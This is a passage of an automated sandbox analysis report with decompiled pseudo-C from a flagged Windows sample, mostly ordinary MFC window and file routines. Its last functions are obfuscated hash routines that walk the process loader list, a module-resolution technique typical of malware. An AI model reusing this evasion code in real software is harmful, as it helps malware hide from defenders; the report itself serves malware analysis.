                                            												goto L80;
                                            											case 0xd:
                                            												__esi = __esi >> 0x10;
                                            												__eax = __ax;
                                            												_push(__ax);
                                            												__eax = __si;
                                            												goto L59;
                                            											case 0xe:
                                            												_push(__esi >> 0x10);
                                            												__eax = __si & 0x0000ffff;
                                            												goto L90;
                                            											case 0xf:
                                            												_push(E00413740(__ebp,  *(__ebp + 0xc)));
                                            												_push(E00413740(__ebp, __esi));
                                            												__eax = 0;
                                            												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
                                            												goto L62;
                                            											case 0x10:
                                            												_push( *(__ebp + 0xc));
                                            												__eax = E00419BA2();
                                            												goto L64;
                                            											case 0x11:
                                            												_push( *(__ebp + 0xc));
                                            												__eax = E00417635();
                                            												goto L64;
                                            											case 0x12:
                                            												_push(__esi >> 0x10);
                                            												__eax = __si & 0x0000ffff;
                                            												_push(__si & 0x0000ffff);
                                            												_push( *(__ebp + 0xc));
                                            												__eax = E00417635();
                                            												goto L62;
                                            											case 0x13:
                                            												_push( *(__ebp + 0xc));
                                            												goto L69;
                                            											case 0x14:
                                            												_push(__esi >> 0x10);
                                            												__eax = __si & 0x0000ffff;
                                            												goto L72;
                                            											case 0x15:
                                            												__eax = __si;
                                            												__esi = __esi >> 0x10;
                                            												__ecx = __si;
                                            												_push(__si);
                                            												L72:
                                            												_push(__eax);
                                            												__eax = E00413740(__ebp,  *(__ebp + 0xc));
                                            												goto L62;
                                            											case 0x16:
                                            												_push(__esi);
                                            												__eax = E00413740(__ebp,  *(__ebp + 0xc));
                                            												L59:
                                            												_push(__eax);
                                            												goto L81;
                                            											case 0x17:
                                            												_push(E00413740(__ebp, __esi));
                                            												L80:
                                            												_push( *(__ebp + 0xc));
                                            												goto L81;
                                            											case 0x18:
                                            												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                            												_push( *(__ebp + 0xc) >> 0x10);
                                            												__eax = E00413740(__ebp, __esi);
                                            												goto L88;
                                            											case 0x19:
                                            												__eax =  *(__ebp + 0xc);
                                            												__edx = __ax;
                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                            												 *((intOrPtr*)(__ebp + 8)) = __edx;
                                            												__eax = __ax;
                                            												 *(__ebp + 0xc) = __eax;
                                            												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
                                            													_push(__eax);
                                            													_push(__edx);
                                            													L81:
                                            													__ecx = __edi;
                                            													__eax =  *__ebx();
                                            													goto L100;
                                            												}
                                            												_push(E00413740(__ebp, __esi));
                                            												_push( *(__ebp + 0xc));
                                            												_push( *((intOrPtr*)(__ebp + 8)));
                                            												goto L91;
                                            											case 0x1a:
                                            												_push(__esi);
                                            												goto L86;
                                            											case 0x1b:
                                            												_push(__esi);
                                            												__ecx = __edi;
                                            												_push( *(__ebp + 0xc));
                                            												__eax =  *__ebx();
                                            												goto L93;
                                            											case 0x1c:
                                            												__eax = __si;
                                            												__esi = __esi >> 0x10;
                                            												__ecx = __si;
                                            												_push(__si);
                                            												goto L83;
                                            											case 0x1d:
                                            												__ecx = __edi;
                                            												__eax =  *__ebx();
                                            												goto L99;
                                            											case 0x1e:
                                            												goto L100;
                                            											case 0x1f:
                                            												_push(__esi);
                                            												L69:
                                            												__eax = E00413740(__ebp);
                                            												L64:
                                            												_push(__eax);
                                            												L86:
                                            												__ecx = __edi;
                                            												__eax =  *__ebx();
                                            												goto L100;
                                            											case 0x20:
                                            												_push(__esi);
                                            												__eax = E00413740(__ebp,  *(__ebp + 0xc));
                                            												L83:
                                            												_push(__eax);
                                            												L98:
                                            												_t154 =  *_t181();
                                            												L99:
                                            												 *(_t205 - 0x10) = _t154;
                                            												goto L100;
                                            											case 0x21:
                                            												__eax = __si & 0x0000ffff;
                                            												_push(__esi);
                                            												_push(__si & 0x0000ffff);
                                            												__eax =  *(__ebp + 0xc);
                                            												__ecx = __edi;
                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                            												_push( *(__ebp + 0xc) >> 0x10);
                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                            												_push( *(__ebp + 0xc) & 0x0000ffff);
                                            												__eax =  *__ebx();
                                            												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                            												L6:
                                            												if(_t168 != 0) {
                                            													goto L100;
                                            												}
                                            												goto L30;
                                            											case 0x22:
                                            												__eax =  *(__ebp + 0xc);
                                            												_push(__esi);
                                            												__eax =  *(__ebp + 0xc) >> 0x10;
                                            												L88:
                                            												_push(__eax);
                                            												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                            												L62:
                                            												_push(__eax);
                                            												goto L91;
                                            											case 0x23:
                                            												__eax = __si;
                                            												__esi = __esi >> 0x10;
                                            												__ecx = __si;
                                            												_push(__si);
                                            												L90:
                                            												_push(__eax);
                                            												_push( *(__ebp + 0xc));
                                            												L91:
                                            												__ecx = __edi;
                                            												__eax =  *__ebx();
                                            												goto L100;
                                            										}
                                            									}
                                            								}
                                            								L96:
                                            								_t181 =  *((intOrPtr*)(_t180 + 0x14));
                                            								goto L97;
                                            							}
                                            						} else {
                                            							L93:
                                            							 *(_t205 - 0x10) = 1;
                                            							L100:
                                            							_t152 =  *(_t205 + 0x14);
                                            							if(_t152 != 0) {
                                            								 *_t152 =  *(_t205 - 0x10);
                                            							}
                                            							_push(1);
                                            							_pop(0);
                                            							L31:
                                            							 *[fs:0x0] =  *((intOrPtr*)(_t205 - 0xc));
                                            							return 0;
                                            						}
                                            					}
                                            					_t167 =  *(_t205 + 0x10);
                                            					if( *_t167 == 0) {
                                            						goto L30;
                                            					}
                                            					_push(_t205 - 0x10);
                                            					_push(_t167);
                                            					_push( *((intOrPtr*)(_t205 + 0xc)));
                                            					_t168 =  *((intOrPtr*)( *__ecx + 0x7c))();
                                            					goto L6;
                                            				}
                                            				_push( *(_t205 + 0x10));
                                            				_push( *((intOrPtr*)(_t205 + 0xc)));
                                            				if( *((intOrPtr*)( *__ecx + 0x78))() == 0) {
                                            					goto L30;
                                            				}
                                            				goto L93;
                                            			}


























                                            0x004149a4
                                            0x004149a7
                                            0x004149ae
                                            0x004149b1
                                            0x004149b4
                                            0x004149b7
                                            0x004149c8
                                            0x004149c9
                                            0x004149d0
                                            0x004149d0
                                            0x004149d2
                                            0x00000000
                                            0x004149d2
                                            0x004149bf
                                            0x004149c0
                                            0x004149c3
                                            0x00000000
                                            0x00000000
                                            0x004149ec
                                            0x00000000
                                            0x00000000
                                            0x00414a18
                                            0x00414a19
                                            0x00414a1b
                                            0x00414a1e
                                            0x00000000
                                            0x00000000
                                            0x004149d9
                                            0x004149dc
                                            0x004149df
                                            0x004149e2
                                            0x00000000
                                            0x00000000
                                            0x004149e6
                                            0x004149e8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00414953
                                            0x00414954
                                            0x00414954
                                            0x0041492a
                                            0x0041492a
                                            0x004149ed
                                            0x004149ed
                                            0x004149ef
                                            0x00000000
                                            0x00000000
                                            0x004147d2
                                            0x004147d6
                                            0x004149e3
                                            0x004149e3
                                            0x00414a5d
                                            0x00414a5f
                                            0x00414a61
                                            0x00414a61
                                            0x00000000
                                            0x00000000
                                            0x00414a29
                                            0x00414a2f
                                            0x00414a30
                                            0x00414a31
                                            0x00414a34
                                            0x00414a36
                                            0x00414a39
                                            0x00414a3a
                                            0x00414a3e
                                            0x00414a3f
                                            0x00414a41
                                            0x00414623
                                            0x00414625
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004149f3
                                            0x004149f6
                                            0x004149f7
                                            0x004149fa
                                            0x004149fa
                                            0x004149fb
                                            0x0041491c
                                            0x0041491c
                                            0x00000000
                                            0x00000000
                                            0x00414a04
                                            0x00414a07
                                            0x00414a0a
                                            0x00414a0d
                                            0x00414a0e
                                            0x00414a0e
                                            0x00414a0f
                                            0x00414a12
                                            0x00414a12
                                            0x00414a14
                                            0x00000000
                                            0x00000000
                                            0x0041479e
                                            0x00414798
                                            0x00414a56
                                            0x00414a56
                                            0x00000000
                                            0x00414a56
                                            0x00414a20
                                            0x00414a20
                                            0x00414a20
                                            0x00414a64
                                            0x00414a64
                                            0x00414a69
                                            0x00414a6e
                                            0x00414a6e
                                            0x00414a70
                                            0x00414a72
                                            0x00414755
                                            0x0041475b
                                            0x00414763
                                            0x00414763
                                            0x0041464b
                                            0x00414608
                                            0x0041460e
                                            0x00000000
                                            0x00000000
                                            0x00414619
                                            0x0041461a
                                            0x0041461b
                                            0x00414620
                                            0x00000000
                                            0x00414620
                                            0x004145eb
                                            0x004145f0
                                            0x004145f8
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004145CF
                                            • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 00414782
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prologVersion
                                            • String ID:
                                            • API String ID: 1836448879-0
                                            • Opcode ID: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
                                            • Instruction ID: 6d1c88816f6b00128a0c6823e596581e0366b3c43c7f26b1fcf2de6b97230d22
                                            • Opcode Fuzzy Hash: 6804e743f549afb56d718e3d7c3f63743442d0cf40abdee9c0b7a5798ec63ac2
                                            • Instruction Fuzzy Hash: 1EE19FB0600215ABDB10DF65CC80AFF77A9AF84715F10811AF8199B291D73CEE82DB6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E004182CC(CHAR* _a4, intOrPtr* _a8) {
                                            				struct _WIN32_FIND_DATAA _v324;
                                            				void* __ebp;
                                            				signed char _t21;
                                            				void* _t23;
                                            				intOrPtr _t36;
                                            				void* _t37;
                                            				signed int _t43;
                                            				intOrPtr* _t45;
                                            
                                            				_t45 = _a8;
                                            				_push(_a4);
                                            				_t43 = _t45 + 0x12;
                                            				_push(_t43);
                                            				_t21 = E00417B29();
                                            				if(_t21 != 0) {
                                            					_t23 = FindFirstFileA(_a4,  &_v324);
                                            					_t44 = _t43 | 0xffffffff;
                                            					if(_t23 != (_t43 | 0xffffffff)) {
                                            						FindClose(_t23);
                                            						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
                                            						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
                                            						 *_t45 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftCreationTime), _t44)));
                                            						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastAccessTime), _t44)));
                                            						_t36 =  *((intOrPtr*)(E00410A21( &_a4,  &(_v324.ftLastWriteTime), _t44)));
                                            						 *((intOrPtr*)(_t45 + 4)) = _t36;
                                            						if( *_t45 == 0) {
                                            							 *_t45 = _t36;
                                            						}
                                            						if( *((intOrPtr*)(_t45 + 8)) == 0) {
                                            							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
                                            						}
                                            						_t37 = 1;
                                            						return _t37;
                                            					}
                                            					L3:
                                            					return 0;
                                            				}
                                            				 *_t43 =  *_t43 & _t21;
                                            				goto L3;
                                            			}












                                            APIs
                                              • Part of subcall function 00417B29: __EH_prolog.LIBCMT ref: 00417B2E
                                              • Part of subcall function 00417B29: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
                                              • Part of subcall function 00417B29: lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
                                            • FindFirstFileA.KERNEL32(?,?,?,?), ref: 004182F8
                                            • FindClose.KERNEL32(00000000), ref: 0041830A
                                              • Part of subcall function 00410A21: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00410A31
                                              • Part of subcall function 00410A21: FileTimeToSystemTime.KERNEL32(?,?), ref: 00410A43
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
                                            • String ID:
                                            • API String ID: 1806329094-0
                                            • Opcode ID: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
                                            • Instruction ID: 6e730e5e3aabd3498d018952e94f1575065a8e7aa0a625f1e4e67d3b2b6d1fdd
                                            • Opcode Fuzzy Hash: b7f339ff05c08edb12b5b07986eaf3c3076bcc97df6ff015d563050ec9bdd282
                                            • Instruction Fuzzy Hash: FB219F32500209AFCB21DF61C840ADAB7F8EF29310F10496EE996D7250E774AAC5CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004238DC(void* __ecx, signed int _a4, intOrPtr _a8) {
                                            				void* __ebx;
                                            				void* _t14;
                                            				signed char _t17;
                                            				void* _t22;
                                            
                                            				_t22 = __ecx;
                                            				_t17 = E00416528(__ecx);
                                            				if((_t17 & 0x80000000) == 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t17 & 0x00000001) == 0)) {
                                            					L6:
                                            					return E004213D8(_t22, _a4, _a8);
                                            				}
                                            				_t14 = E0041538C(_t17, _t22, _a4, _a8);
                                            				if(_t14 == 0) {
                                            					goto L6;
                                            				}
                                            				return _t14;
                                            			}








                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetKeyState.USER32(00000073), ref: 0042390A
                                            • GetKeyState.USER32(00000012), ref: 00423913
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: State$LongWindow
                                            • String ID:
                                            • API String ID: 3716621309-0
                                            • Opcode ID: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
                                            • Instruction ID: 3c56875740f518b2a97b9670c9fd2796869f586b3b5a21460ff62eda90a64155
                                            • Opcode Fuzzy Hash: bb65e0fa9b7d0a7c0d825d9f292ebe4aecda4ee8138cf08f0cea5d2dfc1c7898
                                            • Instruction Fuzzy Hash: 1CF0FCB134022D76DF202956EC00BEA6B65CF517D5F80403BFD045B361CABDDE919258
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E0042252B(void* __ecx, intOrPtr _a4) {
                                            				void* _t4;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            
                                            				_t14 = _a4;
                                            				_t13 = __ecx;
                                            				if(_t14 == 0xffffffff) {
                                            					if(IsWindowVisible( *(__ecx + 0x1c)) != 0) {
                                            						if(IsIconic( *(_t13 + 0x1c)) != 0) {
                                            							_push(9);
                                            							goto L5;
                                            						}
                                            					} else {
                                            						_push(1);
                                            						L5:
                                            						_pop(_t14);
                                            					}
                                            				}
                                            				_t4 = E0042257B(_t13, _t14);
                                            				if(_t14 != 0xffffffff) {
                                            					E0041668C(_t13, _t14);
                                            					return E0042257B(_t13, _t14);
                                            				}
                                            				return _t4;
                                            			}







                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: IconicVisibleWindow
                                            • String ID:
                                            • API String ID: 1797901696-0
                                            • Opcode ID: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
                                            • Instruction ID: eccaba1ee9c055abd401265b19fa06f210334a3ac8d9ba70b154ff4e3b37beae
                                            • Opcode Fuzzy Hash: 3114faafbd09346105cd640fda3e95f07a6d839efd71b6390e56681c449daa18
                                            • Instruction Fuzzy Hash: A9F0A03174053236CA303E2D7D24ABF6A5A6B81364B95822BF520A22E0CBD88CD352DD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E02233F20(intOrPtr __ecx) {
                                            				signed int _t93;
                                            				signed int _t97;
                                            				intOrPtr* _t100;
                                            				signed short* _t103;
                                            				signed int _t108;
                                            				signed int _t113;
                                            				intOrPtr* _t115;
                                            				void* _t118;
                                            
                                            				 *((intOrPtr*)(_t118 + 0xc)) = __ecx;
                                            				_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                                            				 *((intOrPtr*)(_t118 + 0x18)) = _t100;
                                            				_t115 =  *_t100;
                                            				if(_t115 == _t100) {
                                            					L10:
                                            					return 0;
                                            				} else {
                                            					do {
                                            						_t103 =  *(_t115 + 0x30);
                                            						 *(_t118 + 0x14) = 0x9c4e;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0x4464;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 1;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff87db;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff18d7;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff529c;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) + 0xffff507b;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) | 0x3b9f69dc;
                                            						 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xfffffdfe;
                                            						 *(_t118 + 0x10) = 0x31f8;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
                                            						 *(_t118 + 0x10) = 0x4955;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
                                            						 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
                                            						if( *_t103 != 0) {
                                            							do {
                                            								_t97 =  *(_t118 + 0x14);
                                            								 *(_t118 + 0x10) = 0x31f8;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) * 0x75;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x67893507;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x679fe359;
                                            								 *(_t118 + 0x10) = 0x4955;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xa8908194;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) >> 8;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xffffdf1d;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xfffff42f;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) | 0x02e6e862;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) + 0xa6c2;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe36c9a70;
                                            								 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0xe1830958;
                                            								_t113 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
                                            								_t93 =  *_t103 & 0x0000ffff;
                                            								_t108 =  *(_t118 + 0x14) << ( *(_t118 + 0x10) & 0x000000ff);
                                            								if(_t93 >= 0x41 && _t93 <= 0x5a) {
                                            									_t93 = _t93 + 0x20;
                                            								}
                                            								 *(_t118 + 0x14) = _t93;
                                            								_t103 =  &(_t103[1]);
                                            								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t113;
                                            								 *(_t118 + 0x14) =  *(_t118 + 0x14) + _t108;
                                            								 *(_t118 + 0x14) =  *(_t118 + 0x14) - _t97;
                                            							} while ( *_t103 != 0);
                                            							_t100 =  *((intOrPtr*)(_t118 + 0x18));
                                            						}
                                            						if(( *(_t118 + 0x14) ^ 0x344765f2) ==  *((intOrPtr*)(_t118 + 0x1c))) {
                                            							return  *((intOrPtr*)(_t115 + 0x18));
                                            						} else {
                                            							goto L9;
                                            						}
                                            						goto L12;
                                            						L9:
                                            						_t115 =  *_t115;
                                            					} while (_t115 != _t100);
                                            					goto L10;
                                            				}
                                            				L12:
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: UI$dD
                                            • API String ID: 0-2678678791
                                            • Opcode ID: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                            • Instruction ID: 219cd9113a0529c49ec066d2932fa8ea2e25a26c3787037299d77ca87df5f2a2
                                            • Opcode Fuzzy Hash: 5b0b6e09fcfe7a652f9b1521d2d76371d588ae290acbf1882c862c8981155b4e
                                            • Instruction Fuzzy Hash: 6741E3B65083838BD394CF24E54651BBBF0FB90724F440E5DE4A1962A4D3B5DA4DCB93
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E02233D10(signed short* __ecx) {
                                            				signed int _v4;
                                            				signed int _v8;
                                            				signed int _t58;
                                            				signed int _t60;
                                            				signed short* _t65;
                                            				signed int _t68;
                                            				signed int _t72;
                                            
                                            				_v4 = 0x9c4e;
                                            				_t65 = __ecx;
                                            				_v4 = _v4 + 0x4464;
                                            				_v4 = _v4 >> 1;
                                            				_v4 = _v4 + 0xffff87db;
                                            				_v4 = _v4 + 0xffff18d7;
                                            				_v4 = _v4 + 0xffff529c;
                                            				_v4 = _v4 + 0xffff507b;
                                            				_v4 = _v4 | 0x3b9f69dc;
                                            				_v4 = _v4 ^ 0xfffffdfe;
                                            				_v8 = 0x31f8;
                                            				_v8 = _v8 * 0x75;
                                            				_v8 = _v8 ^ 0x67893507;
                                            				_v8 = _v8 ^ 0x679fe359;
                                            				_v8 = 0x4955;
                                            				_v8 = _v8 ^ 0xa8908194;
                                            				_v8 = _v8 >> 8;
                                            				_v8 = _v8 + 0xffffdf1d;
                                            				_v8 = _v8 + 0xfffff42f;
                                            				_v8 = _v8 | 0x02e6e862;
                                            				_v8 = _v8 + 0xa6c2;
                                            				_v8 = _v8 ^ 0xe36c9a70;
                                            				_v8 = _v8 ^ 0xe1830958;
                                            				if( *((short*)(__ecx)) != 0) {
                                            					do {
                                            						_t60 = _v4;
                                            						_v8 = 0x31f8;
                                            						_v8 = _v8 * 0x75;
                                            						_v8 = _v8 ^ 0x67893507;
                                            						_v8 = _v8 ^ 0x679fe359;
                                            						_v8 = 0x4955;
                                            						_v8 = _v8 ^ 0xa8908194;
                                            						_v8 = _v8 >> 8;
                                            						_v8 = _v8 + 0xffffdf1d;
                                            						_v8 = _v8 + 0xfffff42f;
                                            						_v8 = _v8 | 0x02e6e862;
                                            						_v8 = _v8 + 0xa6c2;
                                            						_v8 = _v8 ^ 0xe36c9a70;
                                            						_v8 = _v8 ^ 0xe1830958;
                                            						_t72 = _v4 << (_v8 & 0x000000ff);
                                            						_t58 =  *_t65 & 0x0000ffff;
                                            						_t68 = _v4 << (_v8 & 0x000000ff);
                                            						if(_t58 >= 0x41 && _t58 <= 0x5a) {
                                            							_t58 = _t58 + 0x20;
                                            						}
                                            						_v4 = _t58;
                                            						_t65 =  &(_t65[1]);
                                            						_v4 = _v4 + _t72;
                                            						_v4 = _v4 + _t68;
                                            						_v4 = _v4 - _t60;
                                            					} while ( *_t65 != 0);
                                            				}
                                            				return _v4;
                                            			}











                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: UI$dD
                                            • API String ID: 0-2678678791
                                            • Opcode ID: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                            • Instruction ID: abd7def324b187cfd8a3cae211198b00ac19f47232d130a60b8191d20e68234f
                                            • Opcode Fuzzy Hash: 82085eb77aa1e6d6502ea5e6256e2cd79fe0ef0b357a1ba66029e8c86d29f621
                                            • Instruction Fuzzy Hash: B331BFB2508342AFD3849E2AC54611EBBF0BB90724F46CD5DE0E9861A4D3B88989CF42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E02233BA0(char* __ecx) {
                                            				signed int _v4;
                                            				signed int _v8;
                                            				char* _t83;
                                            
                                            				_v4 = 0x9c4e;
                                            				_v4 = _v4 + 0x4464;
                                            				_v4 = _v4 >> 1;
                                            				_v4 = _v4 + 0xffff87db;
                                            				_v4 = _v4 + 0xffff18d7;
                                            				_v4 = _v4 + 0xffff529c;
                                            				_v4 = _v4 + 0xffff507b;
                                            				_v4 = _v4 | 0x3b9f69dc;
                                            				_v4 = _v4 ^ 0xfffffdfe;
                                            				_v8 = 0x31f8;
                                            				_t83 = __ecx;
                                            				_v8 = _v8 * 0x75;
                                            				_v8 = _v8 ^ 0x67893507;
                                            				_v8 = _v8 ^ 0x679fe359;
                                            				_v8 = 0x4955;
                                            				_v8 = _v8 ^ 0xa8908194;
                                            				_v8 = _v8 >> 8;
                                            				_v8 = _v8 + 0xffffdf1d;
                                            				_v8 = _v8 + 0xfffff42f;
                                            				_v8 = _v8 | 0x02e6e862;
                                            				_v8 = _v8 + 0xa6c2;
                                            				_v8 = _v8 ^ 0xe36c9a70;
                                            				_v8 = _v8 ^ 0xe1830958;
                                            				if( *__ecx != 0) {
                                            					do {
                                            						_t83 = _t83 + 1;
                                            						_v8 = 0x31f8;
                                            						_v8 = _v8 * 0x75;
                                            						_v8 = _v8 ^ 0x67893507;
                                            						_v8 = _v8 ^ 0x679fe359;
                                            						_v8 = 0x4955;
                                            						_v8 = _v8 ^ 0xa8908194;
                                            						_v8 = _v8 >> 8;
                                            						_v8 = _v8 + 0xffffdf1d;
                                            						_v8 = _v8 + 0xfffff42f;
                                            						_v8 = _v8 | 0x02e6e862;
                                            						_v8 = _v8 + 0xa6c2;
                                            						_v8 = _v8 ^ 0xe36c9a70;
                                            						_v8 = _v8 ^ 0xe1830958;
                                            						_v4 =  *((char*)(_t83 - 1));
                                            						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
                                            						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
                                            						_v4 = _v4 - _v4;
                                            					} while ( *_t83 != 0);
                                            				}
                                            				return _v4;
                                            			}







                                            Strings
